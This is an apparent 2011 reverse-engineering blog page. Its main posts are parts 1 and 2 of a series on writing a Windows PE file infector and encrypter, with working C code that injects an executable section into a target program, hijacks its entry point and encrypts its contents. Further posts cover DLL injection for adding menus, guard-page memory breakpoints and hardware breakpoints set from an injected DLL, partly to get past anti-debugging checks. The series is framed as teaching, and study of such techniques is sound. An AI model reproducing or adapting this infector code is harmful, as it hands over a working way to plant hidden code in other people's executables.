RCE Endeavors 😅

April 23, 2011

Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will mainly focus on how to write content into a portable executable (PE) file. The code shown consists of excerpts from the file infector and explanations as to the usage and functionality. The material makes sense the most in context with the source code listing in part 4. Some good background reading and reference material is

  1. Microsoft PE and COFF specification
  2. An In-Depth Look into the Win32 Portable Executable File Format
  3. Inject your code to a Portable Executable

The third article is especially useful, but takes a much different approach to injecting code, and also does not work for applications that use randomized base addresses.

The general concept presented, and what is used in the file infector, is adding a new section to a PE file. The PE structure is best illustrated with tools such as LordPE. A PE file is organized into several structures. These hold offsets into the file for certain properties. This is best illustrated with a graphic

The IMAGE_DOS_HEADER structure (reproduced below) is shown in the graphic above

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

These match up with offsets in the file (e_magic is the first WORD in the file, e_cblp is the second WORD, and so on). The most important property here is e_lfanew. This is an offset to a different structure, IMAGE_NT_HEADERS (reproduced below):

typedef struct _IMAGE_NT_HEADERS {
  DWORD                 Signature;
  IMAGE_FILE_HEADER     FileHeader;
  IMAGE_OPTIONAL_HEADER OptionalHeader;
} IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS;

This structure contains two additional structures, IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER (reproduced below):

typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;
  DWORD                SectionAlignment;
  DWORD                FileAlignment;
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

This structure holds all of the information that is needed to inject a section into a PE file: the needed file alignment, section alignment, the current number of sections, the size of the image, and so on. The last important structure that is required is IMAGE_SECTION_HEADER (reproduced below):

typedef struct _IMAGE_SECTION_HEADER {
  BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;
  DWORD SizeOfRawData;
  DWORD PointerToRawData;
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

This structure will contains all important information about a section in a PE file. It will basically be the structure that has to be (partially) filled out and then written into the file. It will be written following the last section and the value holding the number of sections in IMAGE_FILE_HEADER will be incremented and saved so this section is recognized.

The general idea then is to map the file to memory, find the appropriate structures (IMAGE_DOS_HEADER and IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER), and write our own IMAGE_SECTION_HEADER structure to the file.

The function to map a file to memory is shown below

bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}

This function takes in the target file name, a stub size which is the number of bytes to write into the file, an append mode flag which is used if the file is being modified, and a pfile_info structure which will be filled out upon a successful return. The append mode flag is needed because the target file needs to be opened twice: the first time to obtain the section alignment, and then a second time (after closing it), to write in the instructions with an aligned stub_size parameter. The function demonstrates a pretty straightforward use of the Windows API to perform mapping it into memory. The file_info structure is shown below:

typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;

Now since the file is mapped into memory, it is possible to obtain pointers to the appropriate structures. These can be obtained directly through typecasting the file buffer. An example of how to obtain them is shown below:

PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);

Once the file is mapped, it is possible to start adding the section. The code to add a section is shown below:

//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}

Understanding this function is pretty straightforward as it follows what was said above. It takes in the name of the new section, the size of the new section (aligned to IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.SectionAlignment), and address of the memory mapped file. The IMAGE_DOS_HEADER and IMAGE_NT_HEADERS structures are obtained and the properties in the IMAGE_NT_HEADERS structure are used to properly fill out a custom IMAGE_SECTION_HEADER structure. The last section in the file is obtained and a new one is made following it. This structure is the new section to be added. The important thing to note is that a lot of the properties need to be aligned. Once these properties are filled out, the size of the image is updated and the number of sections is incremented. Now the new section will be recognized. What is left to be done is to write the instructions that this section contains, and to change the entry point to point to this new section. Writing in the instructions is extremely simple:

void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}

Changing the file entry point is slightly more complicated, but not by much. It is simply a matter of finding where the new data is and performing a bit of math to get the correct offset to set as the new entry point.

void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)){
                file_address -= current_section->PointerToRawData;
                file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
                break;
        }
    ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}

And finally, the last thing to do is to encrypt the entire file, with the exception of the written stub (which includes the decryption routine), and the .rdata and .rsrc sections since they both only contain initialized data and resources respectively. The encryption routine that was used is the eXtended TEA (XTEA) block cipher. Every 8 bytes of program data is run through 32 rounds of the cipher and written to the file. The implementation is shown below:

void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        int excluded = 1;
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= strcmp(excluded_sections[j], (char *)current_section->Name);
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}

With all that done, the file can be unmapped from memory and the changes saved with FlushViewOfFile.

A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Background (1/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:53 PM

These next series of posts will focus on explaining a file infector/encrypter that I wrote a week ago or so. It works with any PE32 executable file, overcomes issues with randomized base addresses, and takes advantage of Visual Studio’s C++ compiler to generate the assembly code to inject into the target. This allows for large portions of the injected code to be written in C and greatly speeds up development time. Lastly, the target file is also encrypted by the infector and the decryption routine is written in to decrypt the file image at runtime. The series will be broken up into the four parts listed below:

  1. Background
  2. PE file modification/section injection
  3. Writing the compiled stub
  4. Full source code and remarks

Since this post will focus on the background of the project, there will be no (relevant) code contained in it. This post will discuss the high level concepts involved behind the infector, issues that arise while developing something like this, and provide an overview of the architecture of the infector. The usual warnings come with this article such as using it only to enhance your knowledge and to not be a script kiddie and rip the code to spread malware.

A file infector is simply an application that adds code to another process in hopes of executing that code. This code can itself be an infector which continues to spread to other files, or it can just be an arbitrary block of code with some defining purpose. Simply introducing code to a file is not enough though, as the normal control flow of the target process would never invoke it. Therefore, there are two main options: parts of the target file can be overwritten with a jump to the code, usually called a code cave. This includes variations such as writing itself into a subroutine and jumping to a block containing parts of the original code. The other option is to hijack the entry point the target file and modify it so the process starts up and immediately executes the desired code. The two techniques are illustrated below:

The original control flow of an application

The hijacked version, with a jump to what was an empty part of the process, but now would contain instructions to execute

The added instructions to be executed. The overwritten code is restored at the end and a jump returns control flow back to normal.

The other mentioned technique, modifying the entry point:

The entry point is an offset from the image base and denotes where the program begins execution. It is possible to take control of the application by modifying the entry point to point to the added code block, then jumping from the added code block to the original entry point. One thing to note though is that the ImageBase value is not always reliable, since applications linked with /DYNAMICBASE in Visual Studio (or whatever appropriate linker flag with different compilers) will have a “randomized” base address. This means that the jump back into the original entry point cannot have a hardcoded address (0x00400000 + 0x000153B7 in this case), but instead needs to be found by the injected code at runtime.

The next issue arises when the injected code wants to call any Windows API functions. Load addresses of kernel32.dll, ntdll.dll, and user32.dll are not guaranteed to always be the same, and DLLs such as Ws2_32.dll, Shlwapi.dll, and so on are not even guaranteed to be loaded. This means that call addresses to the Windows API cannot be hardcoded, and it also means that additional DLLs may have to be loaded in order to be their functionality. The good news it that since kernel32.dll is loaded into every process, its load added can be obtained from the process environment block (PEB). Then the export address table (EAT) of kernel32.dll can be walked and the address of LoadLibrary can be obtained to load additional DLLs. All exported functions in the DLL can be found through the function name table and through the usage of the function and ordinal table to obtain the address (more on this in part 3).

The last issue is that functions in the C runtime cannot be used. Again, this issue arises because of randomized base addresses — the address of the desired function simply cannot be hardcoded into the piece of code to be injected. This means that the functions will have to be implemented in assembly. This really isn’t too bad — for my version I only implemented strlen and a variation on strcmp, both needed when traversing the function name table.

The architecture of the infector has two main components: the injection function which will be injected into the target, and the code to map the file, add the code, modify the entry point, and so on. The injection function will be entirely self contained, and written in C and assembly. The C compiler will be leveraged to generate the assembly instructions that will be injected into the target. At runtime, the infector will calculate the length of the injection function, modify part of the function to insert the correct entry point offset, write the instructions into the target file, and lastly modify the entry point of the target file to execute the function upon loading. Lastly, the file will be encrypted. The role of the injection function is to decrypt the contents at runtime and continue normal execution.

A downloadable PDF of this post can be found here

April 17, 2011

Extending External Window Functionality

Filed under: General x86,General x86-64 — admin @ 4:12 PM

An interesting thing I saw many years ago was a plug-in for an old gaming client that added a lot of functionality. Some of the things were simple changes such as just modifying the resources to give the client a sleeker look. Other things were more interesting though, and included adding custom menus, both to the menu bar and context menus. This was interesting since it everything was contained in separate DLLs, which were loaded by the process on startup (parts of the executable were rewritten to jump to loader code). When finding out how this works, I found that it was pretty easy to do. Injected/loaded DLLs are within the address space of the process, so doing all of this is more or less similar to how it would be done when normally developing a GUI application with the Windows API. Unfortunately, this technique does not work as widespread as it did back then. Custom GUI APIs and new additions to Windows such as floating and dockable menus make this technique in its current form less useful. I wanted to put the code that I wrote several years ago on here for archive purposes. The code is old and could possibly be written to be a bit cleaner.

#include <Windows.h>
 
typedef struct _PROCESSWNDINFO {
    HWND hWnd;
    HMENU hMenuBar;
    HMENU hAddedMenu;
    LONG_PTR PrevWndProc;
} PROCESSWNDINFO, *LPPROCESSWNDINFO;
 
const DWORD MENUITEM_ID = 1234;
PROCESSWNDINFO g_WindowInfo;
 
LRESULT CALLBACK SubclassWndProc(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) {
    switch(Msg) {
        case WM_COMMAND:
            switch(wParam) {
            case MENUITEM_ID:
                MessageBox(NULL, L"Added Handler!", L"New item", MB_ICONASTERISK);
                break;
            }
        break;
 
    default: break;
    }
    return CallWindowProc((WNDPROC)g_WindowInfo.PrevWndProc, hWnd, Msg, wParam, lParam);
}
 
BOOL CALLBACK EnumWindowProc(HWND hWnd, LPARAM processId) {
    const INT WINDOW_LENGTH = 32;
    WCHAR windowClass[WINDOW_LENGTH] = {0};
    GetClassName(hWnd, windowClass, sizeof(windowClass));
    if(wcscmp(windowClass, L"GDI+ Hook Window Class") == 0)
        return TRUE;
    DWORD windowProcessId = 0;
    (VOID)GetWindowThreadProcessId(hWnd, &windowProcessId);
    if(windowProcessId == (DWORD)processId) {
        g_WindowInfo.hWnd = hWnd;
        return FALSE;
    }
    return TRUE;
}
 
BOOL GetWindowProperties(LPPROCESSWNDINFO windowInfo) {
    EnumWindows((WNDENUMPROC)EnumWindowProc, (LPARAM)GetCurrentProcessId());
    if(windowInfo->hWnd != NULL) {
        windowInfo->hMenuBar = GetMenu(g_WindowInfo.hWnd);
        windowInfo->PrevWndProc = GetWindowLongPtr(windowInfo->hWnd, GWLP_WNDPROC);
        return TRUE;
    }
    return FALSE;
}
 
HMENU AddNewMenu(LPPROCESSWNDINFO windowInfo, LPCWSTR title) {
    HMENU hNewMenu = CreateMenu();
    if(hNewMenu != NULL && windowInfo->hMenuBar != NULL)
        if(AppendMenu(windowInfo->hMenuBar, MF_STRING | MF_POPUP, (UINT_PTR)hNewMenu, title) != 0)
            return hNewMenu;
    return NULL;
}
 
BOOL AddNewMenuItem(LPPROCESSWNDINFO windowInfo, HMENU hMenu, LPCWSTR title, const DWORD id) {
    BOOL ret = FALSE;
    if(hMenu != NULL)
        ret = AppendMenu(hMenu, MF_STRING, id, title);
    if(windowInfo->hMenuBar != NULL)
        DrawMenuBar(windowInfo->hWnd);
    return ret;
}
 
int APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {
    if(reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hModule);
        if(GetWindowProperties(&g_WindowInfo) == TRUE) {
            g_WindowInfo.hAddedMenu = AddNewMenu(&g_WindowInfo, L"Test");
            AddNewMenuItem(&g_WindowInfo, g_WindowInfo.hAddedMenu, L"Hello", MENUITEM_ID);
            g_WindowInfo.PrevWndProc = SetWindowLongPtr(g_WindowInfo.hWnd, GWLP_WNDPROC, (LONG_PTR)SubclassWndProc);
            }
        }
    return TRUE;
}

The success of the entire technique relies on the fact that GetMenu returns a valid handle to the menu. If this does not happen (the menu bar is actually not a standard menu), then the result is that nothing will happen. It is still possible to append menus/menu items in the case that the menu is not a standard menu. However, this involves reversing the application to see how menus are implemented and handled, or finding the documentation for the graphics API that is being used if it is available. What the code above does is find the window corresponding to the process identifier that this DLL is injected to or loaded from. Once the HWND is found, it is used to get the handle to the menu with

windowInfo->hMenuBar = GetMenu(g_WindowInfo.hWnd);

This handle is used to append the new menu to the menu bar (with AppendMenu). After that, any additional menu items can be appended to that added menu. SetWindowLongPtr is used to set a new window procedure, with the old one being stored to be called later. The handler for the menu items can be implemented in this callback like normal, with control being passed to the original window procedure at the end. One good thing about this technique is that is it done completely through the Windows API, ensuring 32-bit and 64-bit compatibility, ignoring minor details like using SetWindowLongPtr instead of SetWindowLong. If something like this was to be done through API hooks on the window procedure of the application, then there would be a hassle of finding a 32/64-bit compatible hooking library. This code was (re)tested on Windows 7 64-bit. Screenshots for 64/32-bit test applications are shown below — notice the added “Test” menu.

64-bit Minesweeper application:

32-bit DebugView application:

Source file can be found here
A downloadable PDF of this post can be found here

March 25, 2011

Follow-up: Memory Breakpoints

Filed under: General x86 — admin @ 8:13 PM

A quick follow-up to the previous post on hardware breakpoints. One thing that people consider when using hardware breakpoints is that they’re only limited to four addresses to break on within a thread. This is true, and something that cannot be overcome. There are some interesting techniques like executing instructions in one thread through a different one with breakpoints on it, but something like that is rarely done and hardly worth the effort to code correctly. The next viable alternative is done through memory breakpoints. This involves marking the page that the desired address is on as a guard page. As the MSDN documentation says, once a page is marked as a guard page, any access to it raises a STATUS_GUARD_PAGE_VIOLATION exception. The guard flag is then removed and any further accesses are allowed, assuming the guard flag has not been set again. The technique then is simple — find the page that the desired address is on, set it as a guard page, and catch the exception. There is a slight nuance however. Since access to any instruction on the page triggers the STATUS_GUARD_PAGE_VIOLATION exception, trying to reset the guard page status and continue execution in the handler will just result in a loop. A jump to a stub function cannot be used since it is not known what address raised the exception. Thus, the EIP also cannot be safely modified in the STATUS_GUARD_PAGE_VIOLATION handler. What is required is setting the trap flag so the EIP increments before the EXCEPTION_SINGLE_STEP is raised. This EXCEPTION_SINGLE_STEP is also caught and that is where everything takes place. Just like hardware breakpoints, all that is needed is to check if ExceptionAddress is equal to the desired address. If so, then you’ve got the context of the thread and can do as you please. The important thing is to set the page back to a guard page prior to leaving the handler. How the exception handler and how the breakpoint is added is shown below. The code is written for the test application for the hardware breakpoints article and is attached below.

Exception handler:

LONG WINAPI ExceptionFilter(PEXCEPTION_POINTERS ExceptionInfo) {
    if(ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_GUARD_PAGE_VIOLATION) {        
        ExceptionInfo->ContextRecord->EFlags |= 0x100;
	return EXCEPTION_CONTINUE_EXECUTION;
    }
    else if(ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
        if((DWORD)ExceptionInfo->ExceptionRecord->ExceptionAddress == (DWORD)func_addr) {
            PCONTEXT debug_context = ExceptionInfo->ContextRecord;
            printf("Breakpoint hit!\n");
            print_parameters(debug_context);
            modify_text(debug_context);
        }
        MEMORY_BASIC_INFORMATION mem_info;
        DWORD old_protections = 0;
        VirtualQuery((LPCVOID)func_addr, &mem_info, sizeof(MEMORY_BASIC_INFORMATION));
        VirtualProtect(mem_info.BaseAddress, mem_info.RegionSize, mem_info.AllocationProtect | PAGE_GUARD,
            &old_protections);
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

Setting the breakpoint:

DWORD old_protections = 0;
VirtualQuery((LPCVOID)func_addr, &mem_info, sizeof(MEMORY_BASIC_INFORMATION));
VirtualProtect(mem_info.BaseAddress, mem_info.RegionSize, mem_info.AllocationProtect | PAGE_GUARD,
    &old_protections);

It is a pretty interesting technique, and is also how OllyDbg implements its memory breakpoints. The downside though is that it works at the page boundary and can considerably slow down execution time — depending on how often the page is accessed.
Full source for memory breakpoints can be found here
A downloadable PDF of this post can be found here

March 21, 2011

Hardware Breakpoints and Structured/Vectored Exception Handling

Filed under: General x86 — admin @ 11:25 PM

Some good references to read prior to this post. In short, to use hardware breakpoints there are eight debug registers (DR0 to DR7) that can be utilized. Eight, however, is a bit of an overstatement — DR4 and DR5 are no longer used and their functionality is replaced with DR6 and DR7, so there are really six. The debug registers DR0 – DR3 can each hold a linear address to break on depending on how the debug control (DR7) register is set. The debug status (DR6) register lets a debugger determine which debug conditions have occurred. Therefore, you are permitted four addresses to set hardware breakpoints on (assuming that they’re not being chained across threads). What is the utility of these breakpoints? For one, they don’t modify the code that breakpoints are hit on. This is especially useful in the context of defeating simple anti-debugging mechanisms that check function prologues for hooks. All that is required is to install a run-time exception handler and set up hardware breakpoints in the context of the applications main thread, or the thread that is executing the desired code to break on. This can be done with Windows Structured Exception Handling capabilities. Structured Exception Handlers (SEHs) in Windows are stored as a linked list. When an exception is raised, this list is traversed until a handler for the exception is found. If one is found then the handler gains execution of the program and handles the exception. If one is not found then the application goes into an undefined state and may crash depending on the type of exception. Vectored Exception Handler (VEHs) are extensions of SEH that can be installed to watch and handle all exceptions that an application generates. In an application, VEHs are typically added through AddVectoredExceptionHandler instead of __try/__except blocks like SEH. This, however, is pretty irrelevant in terms of hack development — both SEHs and VEHs should be added at runtime. The main benefit that VEHs have is that they are always invoked prior to SEHs (being a “new” feature included in WinXP), and that AddVectoredExceptionHandler lets you specify whether you want your exception handler to be the first one to be called when an exception is raised. This leads most people to prefer VEHs over SEHs nowadays.

To illustrate SEH/VEH I’ve developed a sample application. An injected DLL will install SEH and VEH handlers that will break upon entry to a certain function (whose address is noted in the dialog field for convenience). The goal is to break on the function that takes the text in the enabled edit control and puts it in the disabled edit control following “Current Text:”.

The code for all of this is relatively straightforward. The full listing using SEH is shown below:

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
 
const DWORD func_addr = 0x00401000;
const DWORD func_addr_offset = func_addr + 0x1;
 
void print_parameters(PCONTEXT debug_context) {
    printf("EAX: %X EBX: %X ECX: %X EDX: %X\n",
        debug_context->Eax, debug_context->Ebx, debug_context->Ecx, debug_context->Edx);
    printf("ESP: %X EBP: %X\n",
        debug_context->Esp, debug_context->Ebp);
    printf("ESI: %X EDI: %X\n",
        debug_context->Esi, debug_context->Edi);
    printf("Parameters\n"
        "HWND: %X\n"
        "text: %s\n"
        "length: %i\n",
        (HWND)(*(DWORD*)(debug_context->Esp + 0x4)),
        (char*)(*(DWORD*)(debug_context->Esp + 0x8)),
        (int)(*(DWORD*)(debug_context->Esp + 0xC)));
 
}
 
void modify_text(PCONTEXT debug_context) {
    char* text = (char*)(*(DWORD*)(debug_context->Esp + 0x8));
    int length = strlen(text);
    _snprintf(text, length, "REPLACED");
}
 
void __declspec(naked) change_text_stub(void) {
    __asm {
        push ebp
        jmp [func_addr_offset]
    }
}
 
LONG WINAPI ExceptionFilter(PEXCEPTION_POINTERS ExceptionInfo) {
    if(ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
        if((DWORD)ExceptionInfo->ExceptionRecord->ExceptionAddress == func_addr) {
            PCONTEXT debug_context = ExceptionInfo->ContextRecord;
            printf("Breakpoint hit!\n");
            print_parameters(debug_context);
            modify_text(debug_context);
            debug_context->Eip = (DWORD)&change_text_stub;
            return EXCEPTION_CONTINUE_EXECUTION;
        }
    }
    return EXCEPTION_CONTINUE_SEARCH;
}
 
void set_breakpoints(void) {
    HANDLE hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(hTool32 != INVALID_HANDLE_VALUE) {
        THREADENTRY32 thread_entry32;
        thread_entry32.dwSize = sizeof(THREADENTRY32);
        FILETIME exit_time, kernel_time, user_time;
        FILETIME creation_time;
        FILETIME prev_creation_time;
        prev_creation_time.dwLowDateTime = 0xFFFFFFFF;
        prev_creation_time.dwHighDateTime = INT_MAX;
        HANDLE hMainThread = NULL;
        if(Thread32First(hTool32, &thread_entry32)) {
            do {
                if(thread_entry32.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(thread_entry32.th32OwnerProcessID)
                    && thread_entry32.th32OwnerProcessID == GetCurrentProcessId()
                    && thread_entry32.th32ThreadID != GetCurrentThreadId()) {
                        HANDLE hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION,
                            FALSE, thread_entry32.th32ThreadID);
                        GetThreadTimes(hThread, &creation_time, &exit_time, &kernel_time, &user_time);
                        if(CompareFileTime(&creation_time, &prev_creation_time) == -1) {
                            memcpy(&prev_creation_time, &creation_time, sizeof(FILETIME));
                            if(hMainThread != NULL)
                                CloseHandle(hMainThread);
                            hMainThread = hThread;
                        }
                        else
                            CloseHandle(hThread);
                }
                thread_entry32.dwSize = sizeof(THREADENTRY32);
            } while(Thread32Next(hTool32, &thread_entry32));
            (void)SetUnhandledExceptionFilter(ExceptionFilter);
            CONTEXT thread_context = {CONTEXT_DEBUG_REGISTERS};
            thread_context.Dr0 = func_addr;
            thread_context.Dr7 = (1 << 0);
            SetThreadContext(hMainThread, &thread_context);
            CloseHandle(hMainThread);
        }
        CloseHandle(hTool32);
    }
}
 
int APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {
    if(reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hModule);
        if(AllocConsole()) {
            freopen("CONOUT$", "w", stdout);
            SetConsoleTitle(L"Console");
            SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
            printf("DLL loaded.\n");
        }
        set_breakpoints();
    }
    return TRUE;
}

The DLL entry point sets up a console for debugging purposes and sets the breakpoints. The set_breakpoints function works by taking a snapshot of all threads on the system and iterating through them until the threads of the target process are found. The thread with the earliest creation time within the application is the main thread. The handle for this thread is kept so the debug registers can be set up. Once the main thread is found, the actual SEH handler can be installed. SetUnhandledExceptionFilter sets the ExceptionFilter function as the top-level exception handler so it will be called prior to all others (but not prior to VEHs). The CONTEXT structure is set up with ContextFlags being CONTEXT_DEBUG_REGISTERS, DR0 is set to the desired address, and DR7 is set to a global enable level for the address in DR0. The CONTEXT of the main thread is then set to this new context and the breakpoints are now active. When an exception is raised, ExceptionFilter checks to see whether the exception occurred at the desired address. If so, the exception is handled and now the context record (containing, among other things, the values of all registers and flags when the breakpoint was hit). Since the function sets up a standard BP-based frame, the parameters can all be retrieved through ESP (since the stack frame was not set up yet when the breakpoint was hit). All registers and parameters can then be inspected and/or modified as shown in print_parameters and modify_text. The pictures below show how this looks at run-time:


